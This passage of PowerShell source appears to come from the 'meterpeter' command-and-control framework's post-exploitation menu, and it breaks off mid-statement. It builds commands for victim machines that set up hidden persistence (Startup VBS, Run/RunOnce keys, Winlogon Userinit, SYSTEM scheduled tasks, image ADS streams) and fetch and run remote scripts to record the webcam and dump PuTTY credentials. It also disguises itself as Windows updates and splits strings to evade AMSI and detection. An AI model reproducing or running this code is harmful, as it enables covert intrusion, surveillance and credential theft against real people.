$mSGmE = Read-Host;\r\n If($mSGmE -iMatch '^(y|yes)$')\r\n {\r\n Write-host \" - Input Email Address to where send msg : \" -ForeGroundColor Red -NoNewline;\r\n $OutLokAddr = Read-Host;\r\n }\r\n\r\n $BeaconTime = \"$Delay_Time\"+\"000\";\r\n write-host \" * Execute client ($payload_name.ps1) with $Delay_Time (sec) loop.\" -ForegroundColor Green\r\n Start-Sleep -Seconds 1\r\n Write-Host \"`n`n Scripts Remote Path\" -ForeGroundColor green;\r\n Write-Host \" ------- -----------\";\r\n Write-Host \" $payload_name.ps1 `$Env:TMP\\$payload_name.ps1\";\r\n Write-Host \" $payload_name.vbs `$Env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs\" -ForegroundColor Green;\r\n Write-Host \" Persistence LogFile: $logfile\" -ForeGroundColor yellow;\r\n Write-Host \" [i] On StartUp our client should beacon home from $Delay_Time to $Delay_Time seconds.`n\" -ForeGroundColor DarkGray;\r\n\r\n If($mSGmE -iMatch '^(y|yes)$')\r\n {\r\n #Use Local OUTLOOK to send a message to attacker evertime the persistence.vbs its executed at startup ...\r\n $Command = \"echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"powershell.exe -Win 1 cd `$Env:TMP;powershell.exe -Win 1 iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1 -OutFile ReadEmails.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"powershell.exe -Win 1 cd `$Env:TMP;powershell.exe -Win 1 -File ReadEmails.ps1 -action Send -SendTo $OutLokAddr -SendSubject Meterpeter_C2_v2.10.11 -SendBody Meterpeter_C2_Have_beacon_home`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Do' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'wscript.sleep $BeaconTime' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"cmd.exe /R powershell.exe -Win 1 -File %tmp%\\$payload_name.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Loop' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo `\" [i] Client $Payload_name.ps1 successful Persisted ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n }\r\n Else\r\n {\r\n $Command = \"echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Do' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'wscript.sleep $BeaconTime' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"cmd.exe /R powershell.exe -Win 1 -File %tmp%\\$payload_name.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Loop' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo `\" [i] Client $Payload_name.ps1 successful Persisted ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\"; \r\n }\r\n\r\n ## Writing persistence setting into beacon.log local file ..\r\n echo \"\" >> $logfile\r\n echo \"Persistence Settings\" >> $logfile;\r\n echo \"--------------------\" >> $logfile;\r\n echo \"DATE : $dat\" >> $logfile;\r\n echo \"RHOST : $Remote_Host\" >> $logfile;\r\n echo \"LHOST : $Local_Host\" >> $logfile;\r\n echo \"LPORT : $Local_Port\" >> $logfile;\r\n If($mSGmE -iMatch '^(y|yes)$')\r\n {\r\n echo \"OUTLOOK : $OutLokAddr\" >> $logfile;\r\n }\r\n echo \"\" >> $logfile;\r\n }\r\n If($startup_choise -ieq \"ADSRUN\" -or $startup_choise -ieq \"ADS\")\r\n {\r\n Write-Host \"`n`n Description:\" -ForegroundColor Yellow\r\n Write-Host \" This module ask users to input the client.ps1 and one image.png absoluct\"\r\n Write-Host \" paths then the client.ps1 will be embbebed on image.png (ADS_`$DATA) and\"\r\n Write-Host \" a registry key (HKCU) is created to run image.png `$DATA on every startup.\"\r\n Write-Host \" Remark: This module only accepts [.bat|.txt|.ps1|.exe] pay`load file formats.\" -ForegroundColor Yellow\r\n Write-Host \" Remark: This module can be used to execute other scripts beside client.ps1`n\" -ForegroundColor Yellow\r\n Write-host \" - Execute ADS:run module? (create|find|Clean) : \" -ForeGroundColor DarkGray -NoNewline;\r\n $Chosen_Option = Read-Host;\r\n\r\n If($Chosen_Option -iMatch '^(create)$')\r\n {\r\n Write-host \" - Input 'Update-KB5005101.ps1' absoluct path : \" -ForeGroundColor Red -NoNewline;\r\n $Client_name = Read-Host;\r\n Write-host \" - Input image(.png|.jpg|.jpeg) absoluct path : \" -ForeGroundColor Red -NoNewline;\r\n $Image_name = Read-Host;\r\n\r\n If($Client_name -iMatch '\\\\' -and $Image_name -iMatch '\\\\')\r\n {\r\n $RawImagePath = $Image_name.Split('\\\\')[-1] # blitzo.png\r\n $RawPayloadPath = $Client_name.Split('\\\\')[-1] # Update-KB5005101.ps1\r\n $LegitImage = $Image_name -replace \"\\\\${RawImagePath}\",\"\" # C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\r\n\r\n Write-Host \" * Embebbed '$RawPayloadPath' on '$RawImagePath' (ADS)\" -ForegroundColor Green\r\n Write-Host \" => '$RawImagePath' `$DATA will be executed at startup.\" -ForegroundColor Yellow\r\n Start-Sleep -Seconds 1\r\n\r\n ## Current Settings\r\n # RawImagePath : blitzo.png\r\n # RawPayloadPath : Update-KB5005101.ps1\r\n # LegitImage : C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\r\n # Image_name : C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\\blitzo.png\r\n # Client_name : C:\\Users\\pedro\\AppData\\Local\\Temp\\Update-KB5005101.ps1\r\n ## ORIGINAL: $Command = \"echo `\"@echo off`\"|Out-File `\"${LegitImage}\\ZoneIdentifier.bat`\" -Encoding default -Force;Add-Content ${LegitImage}\\ZoneIdentifier.bat `\"powershell -WindowStyle hidden -File $Client_name`\" -Force;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"create`\" -streamdata `\"${LegitImage}\\ZoneIdentifier.bat`\" -intextfile `\"$Image_name`\" -registry `\"true`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n\r\n #BugReport: @Daniel_Durnea\r\n $Command = \"echo `\"@echo off`\"|Out-File `\"${LegitImage}\\ZoneIdentifier.bat`\" -Encoding default -Force;Add-Content ${LegitImage}\\ZoneIdentifier.bat `\"powershell -C Start-Process -WindowStyle hidden powershell -ArgumentList '-File REPL4CEM3'`\" -Force;((Get-Content -Path ${LegitImage}\\ZoneIdentifier.bat -Raw) -Replace `\"REPL4CEM3`\",`\"$Client_name`\")|Set-Content -Path ${LegitImage}\\ZoneIdentifier.bat -Force;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"create`\" -streamdata `\"${LegitImage}\\ZoneIdentifier.bat`\" -intextfile `\"$Image_name`\" -registry `\"true`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $Command = $Null;\r\n $Chosen_Option = $Null;\r\n $startup_choise = $Null;\r\n Write-Host \"\"\r\n Write-Host \"[error] This module requires 'Absoluct Path' declarations ...\" -ForegroundColor Red -BackgroundColor Black\r\n Start-Sleep -Seconds 1\r\n }\r\n }\r\n ElseIf($Chosen_Option -iMatch '^(find)$')\r\n {\r\n Write-host \" - The directory to start search for `$DATA stream : \" -ForeGroundColor Red -NoNewline;\r\n $StartDir = Read-Host; \r\n \r\n If(-not($StartDir) -or $StartDir -ieq $null){$StartDir = \"$Env:USERPROFILE\"}\r\n\r\n Write-Host \" * Search in '$StartDir' for streams.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"enum`\" -streamdata `\"false`\" -StartDir `\"$StartDir`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n }\r\n ElseIf($Chosen_Option -iMatch '^(clean)$')\r\n {\r\n Write-host \" - Input 'payl`oad.extension' name (stream) : \" -ForeGroundColor Red -NoNewline;\r\n $streamdata = Read-Host;\r\n Write-host \" - Input image(.png|.jpg|.jpeg) absoluct path : \" -NoNewline;\r\n $Image_name = Read-Host;$ParseThisShit = $Image_name.Split('\\\\')[-1]\r\n If(-not($streamdata) -or $streamdata -ieq $null){$streamdata = \"ZoneIdentifier\"}\r\n\r\n Write-Host \" * Delete '$ParseThisShit' ADS `$DATA Stream.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"clear`\" -streamdata `\"$streamdata`\" -intextfile `\"$Image_name`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n }\r\n Else\r\n {\r\n $Command = $Null;\r\n $Chosen_Option = $Null;\r\n $startup_choise = $Null; \r\n }\r\n\r\n }\r\n If($startup_choise -ieq \"RUNONCE\" -or $startup_choise -ieq \"once\")\r\n {\r\n ## If Available use power`shell -ve`rsio`n 2 {AM`SI Logging Evasion}\r\n write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n Write-Host \" Persist Trigger Remote Path\" -ForeGroundColor green;\r\n Write-Host \" ------- -------------------\";\r\n Write-Host \" Update-KB5005101.ps1 `$env:tmp\\KBPersist.vbs`n\";\r\n $Command = \"cmd /R REG ADD 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce' /v KBUpdate /d '%tmp%\\KBPersist.vbs' /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs\";\r\n $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n }\r\n If($startup_choise -ieq \"REGRUN\" -or $startup_choise -ieq \"run\")\r\n {\r\n ## If Available use po`wershell -versi`on 2 {AM`SI Logging Evasion}\r\n write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n Write-Host \" Persist Trigger Remote Path\" -ForeGroundColor green;\r\n Write-Host \" ------- -------------------\";\r\n Write-Host \" Update-KB5005101.ps1 `$env:tmp\\KBPersist.vbs`n\";\r\n $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R $myVer -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}else{cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}}else{cmd /R reg add 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs}\";\r\n }\r\n If($startup_choise -ieq \"Schtasks\" -or $startup_choise -ieq \"tasks\")\r\n {\r\n $onjuyhg = ([char[]]([char]'A'..[char]'Z') + 0..9 | sort {get-random})[0..7] -join '';\r\n write-host \" * Make Client Beacon Home Every xx Minuts.\" -ForegroundColor Green;Start-Sleep -Seconds 1;\r\n write-Host \" - Input Client Remote Path: \" -ForeGroundColor Red -NoNewline;\r\n $execapi = Read-Host;\r\n write-Host \" - Input Beacon Interval (minuts): \" -ForeGroundColor Red -NoNewline;\r\n $Interval = Read-Host;write-host \"`n\";\r\n Write-Host \" TaskName Client Remote Path\" -ForeGroundColor green;\r\n Write-Host \" -------- ------------------\";\r\n Write-Host \" $onjuyhg $execapi\";\r\n write-host \"`n\";\r\n If(-not($Interval)){$Interval = \"10\"}\r\n If(-not($execapi)){$execapi = \"$env:tmp\\Update-KB5005101.ps1\"}\r\n $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n $MyTask = \"scht\" + \"asks /cr\" + \"eate\" -join ''\r\n ## Settings: ($stime == time-interval) | (/st 00:00 /du 0003:00 == 3 hours duration)\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"$myVer -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}else{cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"powershell -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}}else{cmd /R $MyTask /sc minute /mo $Interval /tn `\"$onjuyhg`\" /tr `\"powershell -windowstyle hidden -File `\"$execapi`\" /RU System`\";schtasks /Query /tn `\"$onjuyhg`\" `> schedule.txt;Get-content schedule.txt;Remove-Item schedule.txt -Force}\";\r\n } \r\n If($startup_choise -ieq \"WinLogon\" -or $startup_choise -ieq \"logon\")\r\n {\r\n ## If Available use powers`hell -ver`sion 2 {AM`SI Logging Evasion}\r\n write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n Write-Host \" Persist Trigger Remote Path\" -ForeGroundColor green;\r\n Write-Host \" ------- -------------------\";\r\n Write-Host \" Update-KB5005101.ps1 `$env:tmp\\KBPersist.vbs\";\r\n Write-Host \" HIVEKEY: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v Userinit`n\";\r\n $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' /v Userinit /d %windir%\\system32\\userinit.exe,%tmp%\\KBPersist.vbs /t REG_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R $myVer -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}else{cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' /v Userinit /d %windir%\\system32\\userinit.exe,%tmp%\\KBPersist.vbs /t REG_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}}else{echo `\" Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n }\r\n If($startup_choise -ieq \"Return\" -or $startup_choise -ieq \"return\" -or $logs_choise -ieq \"cls\" -or $logs_choise -ieq \"Modules\" -or $logs_choise -ieq \"modules\" -or $logs_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $startup_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Camera\" -or $choise -ieq \"cam\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow;\r\n write-host \" This module allow users to enumerate webcams available,\"\r\n write-host \" take webcam screenshot(s) or capture webcam live stream.\"\r\n write-host \" Remark: snapshots are stored in remote %TMP% directory.\" -ForegroundColor DarkYellow\r\n write-host \" Remark: webcam turns 'ON' the ligth while recording.\" -ForegroundColor DarkYellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Device List all camera devices UserLand\";\r\n write-host \" SnapShot Capture webcam screenshot UserLand\";\r\n write-host \" WebCamAvi Webcam live stream [.avi] \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Cam> \" -NoNewline -ForeGroundColor Green;\r\n $Cam_choise = Read-Host;\r\n If($Cam_choise -ieq \"Device\")\r\n {\r\n write-host \" * Listing Available WebCams`n\" -ForeGroundColor Green;\r\n $Command = \"Get-PnpDevice -FriendlyName *webcam* -Class Camera,image|Select Status,Class,FriendlyName,InstanceId|Format-Table -AutoSize|Select -SkipLast 1|Out-File `$Env:TMP\\device.log -Force;Get-Content -Path `\"`$Env:TMP\\device.log`\";Remove-Item -Path `\"`$Env:TMP\\device.log`\"`-Force\";\r\n }\r\n If($Cam_choise -ieq \"SnapShot\")\r\n {\r\n write-host \" * Capture one webcam snapshot.\" -ForeGroundColor Green\r\n write-host \"`n State Snapshot\" -ForeGroundColor Green;\r\n write-host \" ----- --------\"\r\n Write-Host \" starting \" -ForegroundColor Red -NoNewline\r\n Write-Host \"image.bmp`n\"\r\n\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/CommandCam.exe`\" -OutFile `\"`$Env:TMP\\commandcam.exe`\";Start-Process -WindowStyle hidden powershell -argumentlist `\"cmd /R start /min %tmp%\\CommandCam.exe`\" -Wait;echo `\" Storage : `$Env:TMP\\image.bmp`\";Remove-Item `$Env:TMP\\CommandCam.exe -Force\";\r\n }\r\n If($Cam_choise -ieq \"WebCamAvi\")\r\n {\r\n write-host \" * Live stream using default webcam.\" -ForeGroundColor Green\r\n\r\n write-host \" - Time to record vid in seconds: \" -ForeGroundColor Red -NoNewline;\r\n [int]$RecTime = Read-Host\r\n If([int]$RecTime -lt 10 -or [int]$RecTime -gt 120)\r\n {\r\n [int]$RecTime = \"10\"\r\n write-host \" => Error: wrong input, default to $RecTime (sec)\" -ForeGroundColor red \r\n }\r\n\r\n write-host \" - Silent install dependencies missing? (y|n): \" -ForegroundColor Red -NoNewline\r\n $DependOff = Read-Host\r\n\r\n $CurrentDate = (Get-Date -Format 'HH:mm')\r\n write-host \" - Schedule webcam record time? ($CurrentDate|now) : \" -NoNewline\r\n $StartTime = Read-Host\r\n If([string]::IsNullOrEmpty($StartTime))\r\n {\r\n $StartTime = \"now\"\r\n write-host \" => Error: wrong input, default to [\" -ForeGroundColor red -NoNewline\r\n write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline \r\n write-host \"]\" -ForeGroundColor red \r\n }\r\n ElseIf($StartTime -iMatch '^(now)$')\r\n {\r\n write-host \" - \" -ForeGroundColor Green -NoNewline\r\n write-host \"Start webcam recording [\" -NoNewline\r\n write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline\r\n write-host \"]\"\r\n }\r\n ElseIf($StartTime -NotMatch '^(\\d+\\d+:+\\d+\\d)$')\r\n {\r\n ## Generate time with 2 minuts ahead\r\n $HourInput = (Get-Date -Format 'HH')\r\n $MinuInput = (Get-Date -Format 'mm')\r\n\r\n If($MinuInput.Length -lt 2)\r\n {\r\n ## Add '0' to string if $MinuInput\r\n # have deleted the '0' from string\r\n $newvalues = [int]$MinuInput+2\r\n $AddExtram = \"0\" + \"$newvalues\" -join '' \r\n }\r\n Else\r\n {\r\n $AddExtram = [int]$MinuInput+2\r\n }\r\n\r\n write-host \" => Error: [$StartTime] input, default to [\" -ForeGroundColor red -NoNewline\r\n $StartTime = \"$HourInput\" + \":\" + \"$AddExtram\" -join ''\r\n write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline \r\n write-host \"] hours\" -ForeGroundColor red \r\n }\r\n Else\r\n {\r\n write-host \" - \" -ForeGroundColor Green -NoNewline\r\n write-host \"Start webcam recording [\" -NoNewline\r\n write-host \"$StartTime\" -ForegroundColor DarkGreen -NoNewline\r\n write-host \"] hours\" \r\n }\r\n\r\n ## Print Settings OnScreen\r\n write-host \"`n`n State VideoFile RecordTime\" -ForegroundColor Green\r\n write-host \" ----- --------- ----------\"\r\n write-host \" running \" -ForegroundColor Red -NoNewline\r\n write-host \"meterpeter.avi ${RecTime} (secs) \"\r\n\r\n If(-not($DependOff) -or $DependOff -iMatch '^(n|no)$')\r\n {\r\n #Execute command remote\r\n $Command = \"`$CheckInstall = [bool](python -V);If(`$CheckInstall -Match 'True'){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WebCam-Capture/Invoke-webcamAvi.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-webcamAvi.ps1`\";Start-Process -WindowStyle hidden powershell -argumentList `\"-file `$Env:TMP\\Invoke-webcamAvi.ps1 -rectime $RecTime -starttime $StartTime -autodel`\";echo `\"`n State : recording webcam live in avi format.`\";echo `\" Remark : module takes a few seconds before start capture.`\";echo `\" Storage : `$Env:TMP\\meterpeter.avi`\"}Else{echo `\"`n `> Error: module requires 'Python3' installed on target system.`\"}\"\r\n }\r\n Else\r\n {\r\n #Execute command remote [silent install dependencies]\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WebCam-Capture/Invoke-webcamAvi.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-webcamAvi.ps1`\";Start-Process -WindowStyle hidden powershell -argumentList `\"-file `$Env:TMP\\Invoke-webcamAvi.ps1 -rectime $RecTime -starttime $StartTime -forceinstall -autodel`\";echo `\"`n State : recording webcam live in avi format.`\";echo `\" State : Silent install python3 dependencies if missing.`\";echo `\" Remark : module takes a few seconds before start capture.`\";echo `\" Storage : `$Env:TMP\\meterpeter.avi`\"\"\r\n }\r\n }\r\n If($Cam_choise -ieq \"Return\" -or $Cam_choise -ieq \"cls\" -or $Cam_choise -ieq \"Modules\" -or $Cam_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Cam_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Restart\")\r\n {\r\n ## Fast restart of Remote-Host (with msgbox)\r\n Write-Host \" - RestartTime: \" -ForeGroundColor Red -NoNewline;\r\n $shutdown_time = Read-Host;\r\n\r\n If(-not ($shutdown_time) -or $shutdown_time -eq \" \")\r\n {\r\n ## Default restart { - RestartTime: blank }\r\n Write-Host \"`n`n Status Schedule Message\" -ForeGroundColor green;\r\n Write-Host \" ------ -------- -------\";\r\n Write-Host \" restart 60 (sec) A restart is required to finish install security updates.\";\r\n\r\n write-Host \"`n`n - Continue? (y|n): \" -NoNewline\r\n $Continue = Read-Host\r\n If($Continue -iMatch '^(y|yes)$')\r\n {\r\n $Command = \"cmd /R shutdown /r /c `\"A restart is required to finish install security updates.`\" /t 60\" \r\n }\r\n Else\r\n {\r\n $Command = $null \r\n }\r\n\r\n }\r\n Else\r\n {\r\n write-host \" - RestartMessage: \" -NoNewline;\r\n $shutdown_msg = Read-Host;\r\n If (-not ($shutdown_msg) -or $shutdown_msg -eq \" \")\r\n {\r\n ## Default msgbox { - RestartMessage: blank }\r\n Write-Host \"`n`n Status Schedule Message\" -ForeGroundColor green;\r\n Write-Host \" ------ -------- -------\";\r\n Write-Host \" restart $shutdown_time (sec) A restart is required to finish install security updates.\";\r\n\r\n write-Host \"`n`n - Continue? (y|n): \" -NoNewline\r\n $Continue = Read-Host\r\n If($Continue -iMatch '^(y|yes)$')\r\n {\r\n $Command = \"cmd /R shutdown /r /c `\"A restart is required to finish install security updates.`\" /t $shutdown_time\"; \r\n }\r\n Else\r\n {\r\n $Command = $null \r\n }\r\n }\r\n Else\r\n {\r\n ## User Inputs { - RestartTime: ++ - RestartMessage: }\r\n Write-Host \"`n`n Status Schedule Message\" -ForeGroundColor green;\r\n Write-Host \" ------ -------- -------\";\r\n Write-Host \" restart $shutdown_time (sec) $shutdown_msg\"\r\n\r\n write-Host \"`n`n - Continue? (y|n): \" -NoNewline\r\n $Continue = Read-Host\r\n If($Continue -iMatch '^(y|yes)$')\r\n {\r\n $Command = \"cmd /R shutdown /r /c `\"$shutdown_msg`\" /t $shutdown_time\" \r\n }\r\n Else\r\n {\r\n $Command = $null \r\n }\r\n }\r\n }\r\n\r\n write-host \"\"\r\n $shutdown_msg = $Null;\r\n $shutdown_time = $Null;\r\n }\r\n If($choise -ieq \"Passwords\" -or $choise -ieq \"pass\")\r\n {\r\n $fdx = \"cr@ede@nti@al du@mp\" -replace '@',''\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Start module searchs for credential strings inside\"\r\n write-host \" all files starting in the input directory recursive.\"\r\n write-host \" Dpapi and Vault modules dumps PasswordVault credentials.\" -ForegroundColor Yellow\r\n write-host \" WDigest invokes m[i]mika[t]z to dump creds from memory\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" File Search for creds inside files UserLand\";\r\n write-host \" Putty Leak PUTTY session(s) creds UserLand\";\r\n write-host \" Dpapi Dump DPAPI masterKeys + blobs UserLand\";\r\n write-host \" Vault Dump creds from PasswordVault UserLand\";\r\n write-host \" WDigest Credential caching [memory] \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" Browser Clear-text $fdx \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" DumpSAM Dump hashs from registry hives \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Post:Pass> \" -NoNewline -ForeGroundColor Green;\r\n $pass_choise = Read-Host;\r\n If($pass_choise -ieq \"Putty\")\r\n {\r\n write-host \" * Dumping PUTTY session(s) creds.`n\" -ForegroundColor Green\r\n $Command = \"iwr -uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Exfiltration/Invoke-PuttyCreds.ps1 -OutFile `$Env:TMP\\Invoke-PuttyCreds.ps1;powershell -File `$Env:TMP\\Invoke-PuttyCreds.ps1 -autodel;Remove-Item -Path `$Env:TMP\\Invoke-PuttyCreds.ps1 -Force\"\r\n }\r\n If($pass_choise -ieq \"DumpSAM\" -or $pass_choise -ieq \"sam\")\r\n {\r\n write-host \" * Dump credentials from registry hives.\" -ForegroundColor Green;write-host \"\";\r\n $Command = 